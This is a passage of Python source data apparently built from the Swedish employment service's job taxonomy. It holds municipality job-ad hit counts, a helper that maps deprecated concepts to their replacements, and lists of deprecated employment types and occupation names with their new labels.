{'id': 'ZkZf_HbK_Mcr', 'name': 'Kungälv', 'type': 'municipality', 'code': '1482', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 10,
'ad_ids': ['24649688', '24636513', '24631373', '24599794', '24597606', '24594445', '24587159', '24487095',
'24361598', '24329253']},
{'id': 'z2cX_rjC_zFo', 'name': 'Lysekil', 'type': 'municipality', 'code': '1484', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24635267', '24618391', '24605089', '24566449', '24554224']},
{'id': 'xQc2_SzA_rHK', 'name': 'Uddevalla', 'type': 'municipality', 'code': '1485', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 19,
'ad_ids': ['24649569', '24648333', '24641531', '24640747', '24639878', '24635023', '24633830', '24627768',
'24624785', '24619542']},
{'id': 'PAxT_FLT_3Kq', 'name': 'Strömstad', 'type': 'municipality', 'code': '1486', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24645683', '24640280', '24612600']},
{'id': 'THif_q6H_MjG', 'name': 'Vänersborg', 'type': 'municipality', 'code': '1487', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 12,
'ad_ids': ['24643619', '24641986', '24626856', '24624150', '24615861', '24615817', '24615329', '24592505',
'24598715', '24598400']},
{'id': 'CSy8_41F_YvX', 'name': 'Trollhättan', 'type': 'municipality', 'code': '1488', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 21,
'ad_ids': ['24646037', '24639347', '24627262', '24624949', '24615219', '24615218', '24609960', '24607976',
'24606466', '24604829']},
{'id': 'UQ75_1eU_jaC', 'name': 'Alingsås', 'type': 'municipality', 'code': '1489', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 19,
'ad_ids': ['24641757', '24632495', '24631417', '24629793', '24626567', '24624598', '24618097', '24615747',
'24607775', '24607729']},
{'id': 'TpRZ_bFL_jhL', 'name': 'Borås', 'type': 'municipality', 'code': '1490', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 74,
'ad_ids': ['24674944', '24649696', '24649621', '24647020', '24641526', '24645912', '24644338', '24643016',
'24641652', '24641101']},
{'id': 'an4a_8t2_Zpd', 'name': 'Ulricehamn', 'type': 'municipality', 'code': '1491', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24650721', '24645207', '24643748', '24639136', '24570351']},
{'id': 'M1UC_Cnf_r7g', 'name': 'Åmål', 'type': 'municipality', 'code': '1492', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24633826', '24629622', '24627722', '24593424', '24541403']},
{'id': 'Lzpu_thX_Wpa', 'name': 'Mariestad', 'type': 'municipality', 'code': '1493', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24646647', '24607084', '24606384']},
{'id': 'FN1Y_asc_D8y', 'name': 'Lidköping', 'type': 'municipality', 'code': '1494', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 9,
'ad_ids': ['24641522', '24624546', '24624090', '24606663', '24606030', '24586133', '24585588', '24516242',
'24417820']},
{'id': 'k1SK_gxg_dW4', 'name': 'Skara', 'type': 'municipality', 'code': '1495', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 13,
'ad_ids': ['24644221', '24639811', '24639532', '24631244', '24616809', '24614229', '24606824', '24600741',
'24595277', '24552003']},
{'id': 'fqAy_4ji_Lz2', 'name': 'Skövde', 'type': 'municipality', 'code': '1496', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 31,
'ad_ids': ['24649472', '24645228', '24642392', '24642391', '24638912', '24636831', '24636136', '24635424',
'24633671', '24628305']},
{'id': 'YbFS_34r_K2v', 'name': 'Hjo', 'type': 'municipality', 'code': '1497', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24624908', '24585725', '24583812', '24573430', '24483113']},
{'id': 'Zsf5_vpP_Bs4', 'name': 'Tidaholm', 'type': 'municipality', 'code': '1498', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24617483', '24600800']},
{'id': 'ZySF_gif_zE4', 'name': 'Falköping', 'type': 'municipality', 'code': '1499', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 8,
'ad_ids': ['24650374', '24640803', '24636373', '24635597', '24630448', '24628992', '24620333', '24617776']},
]
```
#### File: concept_ids/taxonomy_replace/taxonomy_replaced_by_response_by_type.py
```python
def get_old_replaced_by_and_label_from_taxonomy_data(taxonomy_data):
tmp_list = []
for item in taxonomy_data:
tmp_list.append({'old': item['taxonomy/concept']['taxonomy/id'],
'replaced_by': item['taxonomy/concept']['taxonomy/replaced-by'][0]['taxonomy/id'],
'label': item['taxonomy/concept']['taxonomy/replaced-by'][0]['taxonomy/preferred-label'],
})
return tmp_list
change_v1_to_v2_employment_type = [
{'taxonomy/concept': {'taxonomy/id': 'PFZr_Syz_cUq', 'taxonomy/type': 'employment-type',
'taxonomy/definition': 'Vanlig anställning', 'taxonomy/preferred-label': 'Vanlig anställning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'kpPX_CNN_gDU',
'taxonomy/definition': 'En tillsvidareanställning fortsätter tills du själv vill sluta, blir uppsagd eller går i pension. Det finns inte något tidsbestämt datum när anställningen upphör. När du får ett nytt jobb kan det börja med att du får en provanställning. Det innebär att både du och din arbetsgivare har en prövotid på högst sex månader för att se om du passar för jobbet. Om arbetsgivaren är nöjd och om du själv vill fortsätta övergår provanställningen sedan automatiskt till en tillsvidareanställning.',
'taxonomy/type': 'employment-type',
'taxonomy/preferred-label': 'Tillsvidareanställning (inkl. eventuell provanställning)'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Jh8f_q9J_pbJ', 'taxonomy/type': 'employment-type',
'taxonomy/definition': 'Sommarjobb / feriejobb',
'taxonomy/preferred-label': 'Sommarjobb / feriejobb', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'EBhX_Qm2_8eX',
'taxonomy/definition': 'En säsongsanställning är tidsbegränsad till en viss del av året. Det kan till exempel vara att jobba på en campingplats på sommaren eller en skidort på vintern. ',
'taxonomy/type': 'employment-type',
'taxonomy/preferred-label': 'Säsongsanställning'}]},
'taxonomy/version': 2}]
change_v1_to_v2_occupation_name = [
{'taxonomy/concept': {'taxonomy/id': 'Jx4V_6tm_fUH', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Projekteringsingenjör, elkraft',
'taxonomy/preferred-label': 'Projekteringsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'YcvM_Gqk_6U7', 'taxonomy/definition': 'Utvecklingsingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utvecklingsingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'P2bU_f8o_Lkw', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Processingenjör, elkraft',
'taxonomy/preferred-label': 'Processingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'v5nC_xX1_Y7U', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Standardiseringsingenjör, elkraft',
'taxonomy/preferred-label': 'Standardiseringsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'VCsj_Uve_6EJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Köksföreståndare', 'taxonomy/preferred-label': 'Köksföreståndare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'ATAp_LN5_BPU',
'taxonomy/definition': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'sqJi_voF_eaR', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Storhushållsföreståndare',
'taxonomy/preferred-label': 'Storhushållsföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'ATAp_LN5_BPU',
'taxonomy/definition': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'aCbh_uAN_6th', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kursgårdsföreståndare',
'taxonomy/preferred-label': 'Kursgårdsföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'ATAp_LN5_BPU',
'taxonomy/definition': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Yx7u_AbE_Jqk', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Hotellhusfru', 'taxonomy/preferred-label': 'Hotellhusfru',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'cYP6_Tur_q6m', 'taxonomy/definition': 'Arbetsledare, städ/Husfru/Städledare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Arbetsledare, städ/Husfru/Städledare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'JKDm_nyA_8bK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Plastmontör', 'taxonomy/preferred-label': 'Plastmontör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'efyx_6es_7jQ', 'taxonomy/definition': 'Montör, gummi- och plastprodukter',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Montör, gummi- och plastprodukter'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'D3M6_p8P_jdD', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Forskningsingenjör, elkraft',
'taxonomy/preferred-label': 'Forskningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'gE2Y_BMR_Dpq', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Simhallsföreståndare',
'taxonomy/preferred-label': 'Simhallsföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'q6mQ_fnc_A9Y',
'taxonomy/definition': 'Badföreståndare/Simhallsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badföreståndare/Simhallsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'RhoN_Vdo_F5H', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Källarmästare', 'taxonomy/preferred-label': 'Källarmästare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Bfn9_6FK_iaY', 'taxonomy/definition': 'F&B Manager/Food and beverage manager',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'F&B Manager/Food and beverage manager'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'FoCc_qZ4_Yi8', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personlig handläggare, försäkringskassa',
'taxonomy/preferred-label': 'Personlig handläggare, försäkringskassa',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '2AGe_heZ_E94', 'taxonomy/definition': 'Försäkringshandläggare, försäkringskassa',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäkringshandläggare, försäkringskassa'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fo9m_5cC_y8G', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Internrevisor', 'taxonomy/preferred-label': 'Internrevisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'D7tB_NxQ_ZWN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Befolkningsstatistiker',
'taxonomy/preferred-label': 'Befolkningsstatistiker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'GX5o_8RD_rxJ', 'taxonomy/definition': 'Demograf',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Demograf'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'KgMS_ENm_V7z', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Vårdnadsutredare', 'taxonomy/preferred-label': 'Vårdnadsutredare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'dBVw_5Cw_upG', 'taxonomy/definition': 'Familjerättssekreterare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Familjerättssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'cUKA_xwQ_VWk', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Försäkringsaktuarie',
'taxonomy/preferred-label': 'Försäkringsaktuarie', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's9UN_r5w_c5K',
'taxonomy/definition': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AJSy_PSb_tLY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Försäkringsmatematiker',
'taxonomy/preferred-label': 'Försäkringsmatematiker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's9UN_r5w_c5K',
'taxonomy/definition': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'e885_ehx_zxp', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsveterinär', 'taxonomy/preferred-label': 'Stadsveterinär',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'GgmE_SvH_mtm', 'taxonomy/definition': 'Veterinär', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Veterinär'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Zkke_bJ1_Edq', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Näringskonsulent', 'taxonomy/preferred-label': 'Näringskonsulent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'C1FR_RzT_hzP', 'taxonomy/definition': 'Dietist', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Dietist'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'MLPW_mLu_d7K', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Miljövårdsingenjör', 'taxonomy/preferred-label': 'Miljövårdsingenjör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'vUZt_BHY_mk2', 'taxonomy/definition': 'Miljöingenjör/Miljövårdsingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Miljöingenjör/Miljövårdsingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'pp29_K2N_aDY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dietetiker', 'taxonomy/preferred-label': 'Dietetiker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'C1FR_RzT_hzP', 'taxonomy/definition': 'Dietist', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Dietist'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Hv4J_UHc_s7M', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratoriebiträde, fys.lab.',
'taxonomy/preferred-label': 'Laboratoriebiträde, fys.lab.', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'sghA_68W_sYw', 'taxonomy/definition': 'Laboratoriebiträde',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Laboratoriebiträde'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Ttbo_P3H_C4V', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratoriebiträde, kem.lab.',
'taxonomy/preferred-label': 'Laboratoriebiträde, kem.lab.', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'sghA_68W_sYw', 'taxonomy/definition': 'Laboratoriebiträde',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Laboratoriebiträde'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AWpr_8U2_32J', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratoriebiträde, sjukhus',
'taxonomy/preferred-label': 'Laboratoriebiträde, sjukhus', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'sghA_68W_sYw', 'taxonomy/definition': 'Laboratoriebiträde',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Laboratoriebiträde'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'L8Hw_5mJ_zic', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Omsorgskurator', 'taxonomy/preferred-label': 'Omsorgskurator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'YpRs_ybt_47a', 'taxonomy/definition': 'Kurator', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kurator'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Y86G_M6o_9R8', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Primärvårdskurator', 'taxonomy/preferred-label': 'Primärvårdskurator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'YpRs_ybt_47a', 'taxonomy/definition': 'Kurator', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kurator'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'T9MX_dmQ_t5n', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjukhuskurator', 'taxonomy/preferred-label': 'Sjukhuskurator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 's5pR_WNm_R8W', 'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'TChs_6ci_gJQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Familjepedagog', 'taxonomy/preferred-label': 'Familjepedagog',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Fr7W_Yjv_3ik', 'taxonomy/definition': 'Familjebehandlare/Familjepedagog',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Familjebehandlare/Familjepedagog'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1oCZ_J6h_rGV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Förhandlingschef, organisation',
'taxonomy/preferred-label': 'Förhandlingschef, organisation', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'JZgY_jHa_Uwa', 'taxonomy/definition': 'Förhandlingschef',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Förhandlingschef'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2DB2_o9K_sMy', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslichef, organisation',
'taxonomy/preferred-label': 'Kanslichef, organisation', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'V74g_m5Z_BtM', 'taxonomy/definition': 'Kanslichef',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kanslichef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'X4vv_yJ8_Nx1', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Invandrarsekreterare',
'taxonomy/preferred-label': 'Invandrarsekreterare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7yB4_npo_55m', 'taxonomy/definition': 'Invandrarkonsulent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Invandrarkonsulent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'memm_eLn_j1a', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kaplan', 'taxonomy/preferred-label': 'Kaplan',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jQKk_Wzd_pvu', 'taxonomy/definition': 'Komminister', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Komminister'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Dgx7_yw6_CaN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslist', 'taxonomy/preferred-label': 'Kanslist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 's5pR_WNm_R8W', 'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1reZ_8Q1_nwY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalkontorist', 'taxonomy/preferred-label': 'Personalkontorist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'ofiS_5F2_YmV', 'taxonomy/definition': 'HR-assistent', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-assistent'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1zns_dXR_NMQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalredogörare', 'taxonomy/preferred-label': 'Personalredogörare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'ofiS_5F2_YmV', 'taxonomy/definition': 'HR-assistent', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-assistent'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'geo3_qtw_3eP', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Planeringskontorist',
'taxonomy/preferred-label': 'Planeringskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'MbHj_ZVr_WsC', 'taxonomy/definition': 'Personaladministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Personaladministratör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'tNy7_bJc_8FS', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skeppningsassistent',
'taxonomy/preferred-label': 'Skeppningsassistent', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's5pR_WNm_R8W',
'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GiV1_hMx_qUT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skeppningskontorist',
'taxonomy/preferred-label': 'Skeppningskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's5pR_WNm_R8W',
'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4L63_HPx_7uh', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Databastekniker', 'taxonomy/preferred-label': 'Databastekniker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'y763_SQh_71J', 'taxonomy/definition': 'Databasadministratör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Databasadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7oc6_8Rs_fAv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Rederiagent', 'taxonomy/preferred-label': 'Rederiagent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'zthE_Zb1_tjb', 'taxonomy/definition': 'Linjeagent/Rederiagent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Linjeagent/Rederiagent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'sbKP_NHi_eiv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kursadministratör', 'taxonomy/preferred-label': 'Kursadministratör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'QUmN_cfC_zPn',
'taxonomy/definition': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'JPtk_3q6_xBL', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Studiekonsulent', 'taxonomy/preferred-label': 'Studiekonsulent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'QUmN_cfC_zPn',
'taxonomy/definition': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1jLm_pkS_3BX', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Studiesekreterare', 'taxonomy/preferred-label': 'Studiesekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'QUmN_cfC_zPn',
'taxonomy/definition': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7jaj_Pej_27m', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Reklamsekreterare', 'taxonomy/preferred-label': 'Reklamsekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'XYoM_UCq_923', 'taxonomy/definition': 'Reklamassistent/Reklamsekreterare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Reklamassistent/Reklamsekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7Zx9_BVE_Qna', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Trafficman', 'taxonomy/preferred-label': 'Trafficman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'p3m5_Ndd_6im', 'taxonomy/definition': 'Annonsmottagare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Annonsmottagare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ayC6_Lks_sFQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Granskare, revision',
'taxonomy/preferred-label': 'Granskare, revision', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'i5JT_We2_TpX', 'taxonomy/type': 'occupation-name',
